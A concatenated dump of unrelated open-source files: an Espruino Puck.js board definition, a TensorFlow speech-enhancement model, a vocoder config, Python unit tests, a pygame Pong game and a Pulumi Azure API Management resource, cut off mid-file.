d.formats[d.currentIName] = DisplayFormat.DirectQListStorage
d.putItem(value.cast("QList<UserID>"))
|
framework/boards/PUCKJS.py | leeeastwood/Haiway | 162 | 46046 | #!/bin/false
# This file is part of Espruino, a JavaScript interpreter for Microcontrollers
#
# Copyright (C) 2013 <NAME> <<EMAIL>>
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
# ----------------------------------------------------------------------------------------
# This file contains information for a specific board - the available pins, and where LEDs,
# Buttons, and other in-built peripherals are. It is used to build documentation as well
# as various source and header files for Espruino.
# ----------------------------------------------------------------------------------------
import pinutils;
info = {
'name' : "Puck.js",
'link' : [ "http://www.espruino.com/PuckJS" ],
'default_console' : "EV_SERIAL1",
'default_console_tx' : "D28",
'default_console_rx' : "D29",
'default_console_baudrate' : "9600",
'variables' : 2250, # How many variables are allocated for Espruino to use. RAM will be overflowed if this number is too high and code won't compile.
'bootloader' : 1,
'binary_name' : 'espruino_%v_puckjs.hex',
'build' : {
'optimizeflags' : '-Os',
'libraries' : [
'BLUETOOTH',
'NET',
'GRAPHICS',
'CRYPTO','SHA256','SHA512',
'AES',
'NFC',
'NEOPIXEL',
#'FILESYSTEM'
#'TLS'
],
'makefile' : [
'DEFINES+=-DHAL_NFC_ENGINEERING_BC_FTPAN_WORKAROUND=1', # Looks like proper production nRF52s had this issue
'DEFINES+=-DCONFIG_GPIO_AS_PINRESET', # Allow the reset pin to work
'DEFINES+=-DBLUETOOTH_NAME_PREFIX=\'"Puck.js"\'',
'DEFINES+=-DCUSTOM_GETBATTERY=jswrap_puck_getBattery',
'DEFINES+=-DNFC_DEFAULT_URL=\'"https://puck-js.com/go"\'',
'DFU_PRIVATE_KEY=targets/nrf5x_dfu/dfu_private_key.pem',
'DFU_SETTINGS=--application-version 0xff --hw-version 52 --sd-req 0x8C',
'INCLUDE += -I$(ROOT)/libs/puckjs',
'WRAPPERSOURCES += libs/puckjs/jswrap_puck.c'
]
}
};
chip = {
'part' : "NRF52832",
'family' : "NRF52",
'package' : "QFN48",
'ram' : 64,
'flash' : 512,
'speed' : 64,
'usart' : 1,
'spi' : 1,
'i2c' : 1,
'adc' : 1,
'dac' : 0,
'saved_code' : {
'address' : ((118 - 10) * 4096), # Bootloader takes pages 120-127, FS takes 118-119
'page_size' : 4096,
'pages' : 10,
'flash_available' : 512 - ((31 + 8 + 2 + 10)*4) # Softdevice uses 31 pages of flash, bootloader 8, FS 2, code 10. Each page is 4 kb.
},
};
devices = {
'LED1' : { 'pin' : 'D5' },
'LED2' : { 'pin' : 'D4' },
'LED3' : { 'pin' : 'D3' },
'IR' : { 'pin_anode' : 'D25', 'pin_cathode' : 'D26' },
'BTN1' : { 'pin' : 'D0', 'pinstate' : 'IN_PULLDOWN' },
'CAPSENSE' : { 'pin_rx' : 'D11', 'pin_tx' : 'D12' },
'NFC': { 'pin_a':'D9', 'pin_b':'D10' },
'MAG': { 'device': 'MAG3110',
'pin_pwr':'D18',
'pin_int':'D17',
'pin_sda':'D20',
'pin_scl':'D19' }
# Pin D22 is used for clock when driving neopixels - as not specifying a pin seems to break things
};
# left-right, or top-bottom order
board = {
'bottom' : [ 'D28', 'D29', 'D30', 'D31'],
'right' : [ 'GND', '3V', 'D2', 'D1' ],
'left2' : [ 'D6','D7','D8','D11','D13','D14','D16','D23','D24','D27' ],
'right2' : [ 'D15' ],
'_notes' : {
'D11' : "Capacitive sense. D12 is connected to this pin via a 1 MOhm resistor",
'D28' : "If pulled up to 1 on startup, D28 and D29 become Serial1",
'D22' : "This is used as SCK when driving Neopixels with 'require('neopixel').write'"
}
};
board["_css"] = """
#board {
width: 800px;
height: 800px;
top: 0px;
left : 0px;
background-image: url(img/PUCKJS_.jpg);
}
#boardcontainer {
height: 900px;
}
#bottom {
top: 639px;
left: 291px;
}
#right {
top: 304px;
left: 640px;
}
.bottompin { width: 46px; }
.rightpin { height: 51px; }
.pinD6 { position:absolute; left: 560px; top: 419px;}
.pinD7 { position:absolute; left: 548px; top: 369px;}
.pinD8 { position:absolute; left: 512px; top: 398px;}
.pinD11 { position:absolute; left: 586px; top: 236px;}
.pinD13 { position:absolute; left: 500px; top: 293px;}
.pinD14 { position:absolute; left: 523px; top: 270px;}
.pinD15 { position:absolute; right: -483px; top: 268px;}
.pinD16 { position:absolute; left: 499px; top: 244px;}
.pinD23 { position:absolute; left: 157px; top: 438px;}
.pinD24 { position:absolute; left: 157px; top: 382px;}
.pinD27 { position:absolute; left: 244px; top: 581px;}
""";
def get_pins():
pins = pinutils.generate_pins(0,31) # 32 General Purpose I/O Pins.
pinutils.findpin(pins, "PD0", True)["functions"]["XL1"]=0;
pinutils.findpin(pins, "PD1", True)["functions"]["XL2"]=0;
pinutils.findpin(pins, "PD9", True)["functions"]["NFC1"]=0;
pinutils.findpin(pins, "PD10", True)["functions"]["NFC2"]=0;
pinutils.findpin(pins, "PD2", True)["functions"]["ADC1_IN0"]=0;
pinutils.findpin(pins, "PD3", True)["functions"]["ADC1_IN1"]=0;
pinutils.findpin(pins, "PD4", True)["functions"]["ADC1_IN2"]=0;
pinutils.findpin(pins, "PD5", True)["functions"]["ADC1_IN3"]=0;
pinutils.findpin(pins, "PD28", True)["functions"]["ADC1_IN4"]=0;
pinutils.findpin(pins, "PD28", True)["functions"]["USART1_TX"]=0;
pinutils.findpin(pins, "PD29", True)["functions"]["USART1_RX"]=0;
pinutils.findpin(pins, "PD29", True)["functions"]["ADC1_IN5"]=0;
pinutils.findpin(pins, "PD30", True)["functions"]["ADC1_IN6"]=0;
pinutils.findpin(pins, "PD31", True)["functions"]["ADC1_IN7"]=0;
# everything is non-5v tolerant
for pin in pins:
pin["functions"]["3.3"]=0;
#The boot/reset button will function as a reset button in normal operation. Pin reset on PD21 needs to be enabled on the nRF52832 device for this to work.
return pins
|
malaya_speech/train/model/resnet_unet_enhancement/model.py | ishine/malaya-speech | 111 | 46056 | import tensorflow as tf
from tensorflow.keras.layers import (
BatchNormalization,
LeakyReLU,
Activation,
Conv1D,
ELU,
Add,
)
from functools import partial
from tensorflow.compat.v1.keras.initializers import he_uniform
def _get_conv_activation_layer(params):
"""
:param params:
:returns: Required Activation function.
"""
conv_activation = params.get('conv_activation')
if conv_activation == 'ReLU':
return ReLU()
elif conv_activation == 'ELU':
return ELU()
return LeakyReLU(0.2)
class UpSamplingLayer:
def __init__(self, channel_out, kernel_size=5, stride=1):
self.seq = tf.keras.Sequential()
self.seq.add(
tf.keras.layers.Conv1D(
channel_out,
kernel_size=kernel_size,
strides=stride,
padding='SAME',
dilation_rate=1,
)
)
self.seq.add(BatchNormalization(axis=-1))
self.seq.add(LeakyReLU(0.2))
def __call__(self, x, training=True):
return self.seq(x, training=training)
class Model:
def __init__(
self,
inputs,
training=True,
ksize=5,
n_layers=12,
channels_interval=24,
logging=True,
):
conv_activation_layer = _get_conv_activation_layer({})
kernel_initializer = he_uniform(seed=50)
conv1d_factory = partial(
Conv1D,
strides=(2),
padding='same',
kernel_initializer=kernel_initializer,
)
def resnet_block(input_tensor, filter_size):
res = conv1d_factory(
filter_size, (1), strides=(1), use_bias=False
)(input_tensor)
conv1 = conv1d_factory(filter_size, (5), strides=(1))(
input_tensor
)
batch1 = BatchNormalization(axis=-1)(conv1, training=training)
rel1 = conv_activation_layer(batch1)
conv2 = conv1d_factory(filter_size, (5), strides=(1))(rel1)
batch2 = BatchNormalization(axis=-1)(conv2, training=training)
resconnection = Add()([res, batch2])
rel2 = conv_activation_layer(resconnection)
return rel2
self.n_layers = n_layers
self.channels_interval = channels_interval
out_channels = [
i * self.channels_interval for i in range(1, self.n_layers + 1)
]
self.middle = tf.keras.Sequential()
self.middle.add(
tf.keras.layers.Conv1D(
self.n_layers * self.channels_interval,
kernel_size=15,
strides=1,
padding='SAME',
dilation_rate=1,
)
)
self.middle.add(BatchNormalization(axis=-1))
self.middle.add(LeakyReLU(0.2))
decoder_out_channels_list = out_channels[::-1]
self.decoder = []
for i in range(self.n_layers):
self.decoder.append(
UpSamplingLayer(channel_out=decoder_out_channels_list[i])
)
self.out = tf.keras.Sequential()
self.out.add(
tf.keras.layers.Conv1D(
1,
kernel_size=1,
strides=1,
padding='SAME',
dilation_rate=1,
)
)
self.out.add(Activation('tanh'))
tmp = []
o = inputs
for i in range(self.n_layers):
o = resnet_block(o, out_channels[i])
tmp.append(o)
o = o[:, ::2]
if logging:
print(o)
o = self.middle(o, training=training)
if logging:
print(o)
for i in range(self.n_layers):
o = tf.image.resize(
o, [tf.shape(o)[0], tf.shape(o)[1] * 2], method='nearest'
)
o = tf.concat([o, tmp[self.n_layers - i - 1]], axis=2)
o = self.decoder[i](o, training=training)
if logging:
print(o)
if logging:
print(o, inputs)
o = tf.concat([o, inputs], axis=2)
o = self.out(o, training=training)
self.logits = o
|
voicefixer/vocoder/config.py | ishine/voicefixer | 159 | 46083 | <reponame>ishine/voicefixer<filename>voicefixer/vocoder/config.py
import torch
import numpy as np
import os
from voicefixer.tools.path import root_path
class Config:
@classmethod
def refresh(cls, sr):
if sr == 44100:
Config.ckpt = os.path.join(
os.path.expanduser("~"),
".cache/voicefixer/synthesis_module/44100/model.ckpt-1490000_trimed.pt",
)
Config.cond_channels = 512
Config.m_channels = 768
Config.resstack_depth = [8, 8, 8, 8]
Config.channels = 1024
Config.cin_channels = 128
Config.upsample_scales = [7, 7, 3, 3]
Config.num_mels = 128
Config.n_fft = 2048
Config.hop_length = 441
Config.sample_rate = 44100
Config.fmax = 22000
Config.mel_win = 128
Config.local_condition_dim = 128
else:
raise RuntimeError(
"Error: Vocoder currently only support 44100 samplerate."
)
ckpt = os.path.join(
os.path.expanduser("~"),
".cache/voicefixer/synthesis_module/44100/model.ckpt-1490000_trimed.pt",
)
m_channels = 384
bits = 10
opt = "Ralamb"
cond_channels = 256
clip = 0.5
num_bands = 1
cin_channels = 128
upsample_scales = [7, 7, 3, 3]
filterbands = "test/filterbanks_4bands.dat"
##For inference
tag = ""
min_db = -115
num_mels = 128
n_fft = 2048
hop_length = 441
win_size = None
sample_rate = 44100
frame_shift_ms = None
trim_fft_size = 512
trim_hop_size = 128
trim_top_db = 23
signal_normalization = True
allow_clipping_in_normalization = True
symmetric_mels = True
max_abs_value = 4.0
preemphasis = 0.85
min_level_db = -100
ref_level_db = 20
fmin = 50
fmax = 22000
power = 1.5
griffin_lim_iters = 60
rescale = False
rescaling_max = 0.95
trim_silence = False
clip_mels_length = True
max_mel_frames = 2000
mel_win = 128
batch_size = 24
g_learning_rate = 0.001
d_learning_rate = 0.001
warmup_steps = 100000
decay_learning_rate = 0.5
exponential_moving_average = True
ema_decay = 0.99
reset_opt = False
reset_g_opt = False
reset_d_opt = False
local_condition_dim = 128
lambda_update_G = 1
multiscale_D = 3
lambda_adv = 4.0
lambda_fm_loss = 0.0
lambda_sc_loss = 5.0
lambda_mag_loss = 5.0
lambda_mel_loss = 50.0
use_mle_loss = False
lambda_mle_loss = 5.0
lambda_freq_loss = 2.0
lambda_energy_loss = 100.0
lambda_t_loss = 200.0
lambda_phase_loss = 100.0
lambda_f0_loss = 1.0
use_elu = False
de_preem = False # train
up_org = False
use_one = True
use_small_D = False
use_condnet = True
use_depreem = False # inference
use_msd = False
model_type = "tfgan" # or bytewave, frame level vocoder using istft
use_hjcud = False
no_skip = False
out_channels = 1
use_postnet = False # wn in postnet
use_wn = False # wn in resstack
up_type = "transpose"
use_smooth = False
use_drop = False
use_shift_scale = False
use_gcnn = False
resstack_depth = [6, 6, 6, 6]
kernel_size = [3, 3, 3, 3]
channels = 512
use_f0_loss = False
use_sine = False
use_cond_rnn = False
use_rnn = False
f0_step = 120
use_lowfreq_loss = False
lambda_lowfreq_loss = 1.0
use_film = False
use_mb_mr_gan = False
use_mssl = False
use_ml_gan = False
use_mb_gan = True
use_mpd = False
use_spec_gan = True
use_rwd = False
use_mr_gan = True
use_pqmf_rwd = False
no_sine = False
use_frame_mask = False
lambda_var_loss = 0.0
discriminator_train_start_steps = 40000 # 80k
aux_d_train_start_steps = 40000 # 100k
rescale_out = 0.40
use_dist = True
dist_backend = "nccl"
dist_url = "tcp://localhost:12345"
world_size = 1
mel_weight_torch = torch.tensor(
[
19.40951426,
19.94047336,
20.4859038,
21.04629067,
21.62194148,
22.21335214,
22.8210215,
23.44529231,
24.08660962,
24.74541882,
25.42234287,
26.11770576,
26.83212784,
27.56615283,
28.32007747,
29.0947679,
29.89060111,
30.70832636,
31.54828121,
32.41121487,
33.29780773,
34.20865341,
35.14437675,
36.1056621,
37.09332763,
38.10795802,
39.15039691,
40.22119881,
41.32154931,
42.45172373,
43.61293329,
44.80609379,
46.031602,
47.29070223,
48.58427549,
49.91327905,
51.27863232,
52.68119708,
54.1222372,
55.60274206,
57.12364703,
58.68617876,
60.29148652,
61.94081306,
63.63501986,
65.37562658,
67.16408954,
69.00109084,
70.88850318,
72.82736101,
74.81985537,
76.86654792,
78.96885475,
81.12900906,
83.34840929,
85.62810662,
87.97005418,
90.37689804,
92.84887686,
95.38872881,
97.99777002,
100.67862715,
103.43232942,
106.26140638,
109.16827015,
112.15470471,
115.22184756,
118.37439245,
121.6122689,
124.93877158,
128.35661454,
131.86761321,
135.47417938,
139.18059494,
142.98713744,
146.89771854,
150.91684347,
155.0446638,
159.28614648,
163.64270198,
168.12035831,
172.71749158,
177.44220154,
182.29556933,
187.28286676,
192.40502126,
197.6682721,
203.07516896,
208.63088733,
214.33770931,
220.19910108,
226.22363072,
232.41087124,
238.76803591,
245.30079083,
252.01064464,
258.90261676,
265.98474,
273.26010248,
280.73496362,
288.41440094,
296.30489752,
304.41180337,
312.7377183,
321.28877878,
330.07870237,
339.10812951,
348.38276173,
357.91393924,
367.70513992,
377.76413924,
388.09467408,
398.70920178,
409.61813793,
420.81980127,
432.33215467,
444.16083117,
456.30919947,
468.78589276,
481.61325588,
494.78824596,
508.31969844,
522.2238331,
536.51163441,
551.18859414,
566.26142988,
581.75006061,
597.66210737,
]
)
x_orig = np.linspace(1, mel_weight_torch.shape[0], num=mel_weight_torch.shape[0])
x_orig_torch = torch.linspace(
1, mel_weight_torch.shape[0], steps=mel_weight_torch.shape[0]
)
@classmethod
def get_mel_weight(cls, percent=1, a=18.8927416350036, b=0.0269863588184314):
b = percent * b
def func(a, b, x):
return a * np.exp(b * x)
return func(a, b, Config.x_orig)
@classmethod
def get_mel_weight_torch(cls, percent=1, a=18.8927416350036, b=0.0269863588184314):
b = percent * b
def func(a, b, x):
return a * torch.exp(b * x)
return func(a, b, Config.x_orig_torch)
|
build/platform/python/tests/test_common.py | jochenater/catboost | 6,989 | 46084 | import subprocess
import pytest
from build.platform.python.tests import testlib
PYTHON_VERSIONS = ["2.7", "3.4", "3.5", "3.6"] # 3.7, 3.8 are not runnable
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_version_matched(pyver):
testlib.check_python_version(pyver)
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_python_max_unicode_bytes(pyver):
cmd = [testlib.get_python_bin(pyver), '-c', 'import sys; print(sys.maxunicode)']
maxunicode = subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode('utf-8')
assert int(maxunicode) > 65535, "Found UCS2 build"
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_python_imports(pyver):
imports = {
"2.7": ['pkg_resources'],
"3.4": [],
"3.5": ['pkg_resources'],
"3.6": [],
}
for imp in imports[pyver]:
subprocess.check_call([testlib.get_python_bin(pyver), '-c', 'import ' + imp])
|
idangr_core.py | IMULMUL/IDAngr | 237 | 46108 | <gh_stars>100-1000
######################################################
# Author: <NAME> <<EMAIL>> #
# License: BSD 2-Clause #
######################################################
import idangr
print
print "################### IDAngr ###################"
print " usage: idangr.init(is_remote, host, port)"
print " import angrdbg"
print
|
python-pong/main.py | emobileingenieria/youtube | 176 | 46119 | import pygame
from pygame.locals import *
from paddle import Paddle
from ball import Ball
from inputs import handle_events, handle_input
from constants import SCREEN_WIDTH, SCREEN_HEIGHT, WHITE, RED
ball = None
left_paddle = None
right_paddle = None
pygame.init()
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
pygame.display.set_caption("Python PONG")
clock = pygame.time.Clock()
done = [False]
is_game_over = [False]
def setup_game():
global ball
global left_paddle
global right_paddle
ball = Ball((SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2))
left_paddle = Paddle()
right_paddle = Paddle()
right_paddle.rect.x = SCREEN_WIDTH - right_paddle.rect.width
def draw_game_over():
font = pygame.font.Font("freesansbold.ttf", 32)
game_over = font.render("GAME OVER", True, RED)
game_over_rect = game_over.get_rect()
game_over_rect.center = (SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2)
screen.blit(game_over, game_over_rect)
def draw_game():
left_paddle.draw(screen)
right_paddle.draw(screen)
ball.draw(screen)
def draw():
screen.fill(WHITE)
if is_game_over[0]:
draw_game_over()
else:
draw_game()
pygame.display.flip()
def update():
handle_events(done)
if not is_game_over[0]:
handle_input(left_paddle, right_paddle)
ball.update(left_paddle, right_paddle, is_game_over)
setup_game()
while not done[0]:
clock.tick(30)
update()
draw()
pygame.quit()
|
hs_access_control/tests/test_group_public.py | tommac7/hydroshare | 178 | 46148 | from django.test import TestCase
from django.contrib.auth.models import Group
from hs_access_control.models import PrivilegeCodes
from hs_core import hydroshare
from hs_core.testing import MockIRODSTestCaseMixin
from hs_access_control.tests.utilities import global_reset, is_equal_to_as_set
class T09GroupPublic(MockIRODSTestCaseMixin, TestCase):
def setUp(self):
super(T09GroupPublic, self).setUp()
global_reset()
self.group, _ = Group.objects.get_or_create(name='Hydroshare Author')
self.admin = hydroshare.create_account(
'<EMAIL>',
username='admin',
first_name='administrator',
last_name='couch',
superuser=True,
groups=[]
)
self.dog = hydroshare.create_account(
'<EMAIL>',
username='dog',
first_name='<NAME>',
last_name='last_name_dog',
superuser=False,
groups=[]
)
self.squirrels = hydroshare.create_resource(
resource_type='GenericResource',
owner=self.dog,
title='all about chasing squirrels',
metadata=[],
)
self.holes = hydroshare.create_resource(
resource_type='GenericResource',
owner=self.dog,
title='all about storing bones in holes',
metadata=[],
)
# dog owns canines group
self.canines = self.dog.uaccess.create_group(
title='canines', description="We are the canines")
def test_public_resources(self):
""" public resources contain those resources that are public and discoverable """
res = self.canines.gaccess.public_resources
self.assertTrue(is_equal_to_as_set(res, []))
self.dog.uaccess.share_resource_with_group(self.squirrels, self.canines,
PrivilegeCodes.VIEW)
self.dog.uaccess.share_resource_with_group(self.holes, self.canines,
PrivilegeCodes.VIEW)
res = self.canines.gaccess.public_resources
self.assertTrue(is_equal_to_as_set(res, []))
self.holes.raccess.public = True
self.holes.raccess.discoverable = True
self.holes.raccess.save() # this avoids regular requirements for "public"
res = self.canines.gaccess.public_resources
self.assertTrue(is_equal_to_as_set(res, [self.holes]))
for r in res:
self.assertEqual(r.public, r.raccess.public)
self.assertEqual(r.discoverable, r.raccess.discoverable)
self.assertEqual(r.published, r.raccess.published)
self.assertEqual(r.group_name, self.canines.name)
self.assertEqual(r.group_id, self.canines.id)
self.squirrels.raccess.discoverable = True
self.squirrels.raccess.save()
res = self.canines.gaccess.public_resources
self.assertTrue(is_equal_to_as_set(res, [self.holes, self.squirrels]))
for r in res:
self.assertEqual(r.public, r.raccess.public)
self.assertEqual(r.discoverable, r.raccess.discoverable)
self.assertEqual(r.published, r.raccess.published)
self.assertEqual(r.group_name, self.canines.name)
self.assertEqual(r.group_id, self.canines.id)
|
visualize/example/__init__.py | rentainhe/visualization | 169 | 46161 | from .grid_attention_example import run_grid_attention_example
from .region_attention_example import run_region_attention_example |
tests/test_utils.py | metasyn/scikeras | 111 | 46221 | import numpy as np
import pytest
from tensorflow.keras import losses as losses_module
from tensorflow.keras import metrics as metrics_module
from scikeras.utils import loss_name, metric_name
class CustomLoss(losses_module.Loss):
pass
class CustomMetric(metrics_module.AUC):
pass
@pytest.mark.parametrize(
"obj",
[
"categorical_crossentropy",
"CategoricalCrossentropy",
losses_module.categorical_crossentropy,
losses_module.CategoricalCrossentropy,
losses_module.CategoricalCrossentropy(),
],
)
def test_loss_invariance(obj):
"""Test to make sure loss_name returns same string no matter which object
is passed (str, function, class, type)"""
assert loss_name(obj) == "categorical_crossentropy"
@pytest.mark.parametrize("obj", [CustomLoss, CustomLoss()])
def test_custom_loss(obj):
assert loss_name(obj) == "custom_loss"
@pytest.mark.parametrize(
"obj",
[
"categorical_crossentropy",
"CategoricalCrossentropy",
metrics_module.categorical_crossentropy,
metrics_module.CategoricalCrossentropy,
metrics_module.CategoricalCrossentropy(),
],
)
def test_metric_invariance(obj):
"""Test to make sure same metric returned no matter which object passed"""
assert metric_name(obj) == "categorical_crossentropy"
@pytest.mark.parametrize("loss", [object(), object, list()])
def test_loss_types(loss):
with pytest.raises(TypeError, match="``loss`` must be a"):
loss_name(loss)
def test_unknown_loss_raises():
with pytest.raises(ValueError, match="Unknown loss function"):
loss_name("unknown_loss")
@pytest.mark.parametrize("obj", [object(), object, list()])
def test_metric_types(obj):
with pytest.raises(TypeError, match="``metric`` must be a"):
metric_name(obj)
def test_unknown_metric():
with pytest.raises(ValueError, match="Unknown metric function"):
metric_name("unknown_metric")
@pytest.mark.parametrize("metric", [CustomMetric, CustomMetric()])
def test_custom_metric(metric):
assert metric_name(metric) == "custom_metric"
|
sdk/python/pulumi_azure/apimanagement/product_api.py | henriktao/pulumi-azure | 109 | 46223 | <reponame>henriktao/pulumi-azure<gh_stars>100-1000
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ProductApiArgs', 'ProductApi']
@pulumi.input_type
class ProductApiArgs:
def __init__(__self__, *,
api_management_name: pulumi.Input[str],
api_name: pulumi.Input[str],
product_id: pulumi.Input[str],
resource_group_name: pulumi.Input[str]):
"""
The set of arguments for constructing a ProductApi resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] product_id: The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "api_management_name", api_management_name)
pulumi.set(__self__, "api_name", api_name)
pulumi.set(__self__, "product_id", product_id)
pulumi.set(__self__, "resource_group_name", resource_group_name)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> pulumi.Input[str]:
"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@api_management_name.setter
def api_management_name(self, value: pulumi.Input[str]):
pulumi.set(self, "api_management_name", value)
@property
@pulumi.getter(name="apiName")
def api_name(self) -> pulumi.Input[str]:
"""
The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_name")
@api_name.setter
def api_name(self, value: pulumi.Input[str]):
pulumi.set(self, "api_name", value)
@property
@pulumi.getter(name="productId")
def product_id(self) -> pulumi.Input[str]:
"""
The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "product_id")
@product_id.setter
def product_id(self, value: pulumi.Input[str]):
pulumi.set(self, "product_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@pulumi.input_type
class _ProductApiState:
def __init__(__self__, *,
api_management_name: Optional[pulumi.Input[str]] = None,
api_name: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ProductApi resources.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] product_id: The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
if api_management_name is not None:
pulumi.set(__self__, "api_management_name", api_management_name)
if api_name is not None:
pulumi.set(__self__, "api_name", api_name)
if product_id is not None:
pulumi.set(__self__, "product_id", product_id)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@api_management_name.setter
def api_management_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_management_name", value)
@property
@pulumi.getter(name="apiName")
def api_name(self) -> Optional[pulumi.Input[str]]:
"""
The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_name")
@api_name.setter
def api_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_name", value)
@property
@pulumi.getter(name="productId")
def product_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "product_id")
@product_id.setter
def product_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "product_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
class ProductApi(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
api_name: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages an API Management API Assignment to a Product.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_service = azure.apimanagement.get_service(name="example-api",
resource_group_name="example-resources")
example_api = azure.apimanagement.get_api(name="search-api",
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name,
revision="2")
example_product = azure.apimanagement.get_product(product_id="my-product",
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name)
example_product_api = azure.apimanagement.ProductApi("exampleProductApi",
api_name=example_api.name,
product_id=example_product.product_id,
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name)
```
## Import
API Management Product API's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/productApi:ProductApi example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/service1/products/exampleId/apis/apiId
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] product_id: The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ProductApiArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an API Management API Assignment to a Product.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_service = azure.apimanagement.get_service(name="example-api",
resource_group_name="example-resources")
example_api = azure.apimanagement.get_api(name="search-api",
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name,
revision="2")
example_product = azure.apimanagement.get_product(product_id="my-product",
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name)
example_product_api = azure.apimanagement.ProductApi("exampleProductApi",
api_name=example_api.name,
product_id=example_product.product_id,
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name)
```
## Import
API Management Product API's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/productApi:ProductApi example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/service1/products/exampleId/apis/apiId
```
:param str resource_name: The name of the resource.
:param ProductApiArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ProductApiArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
api_name: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
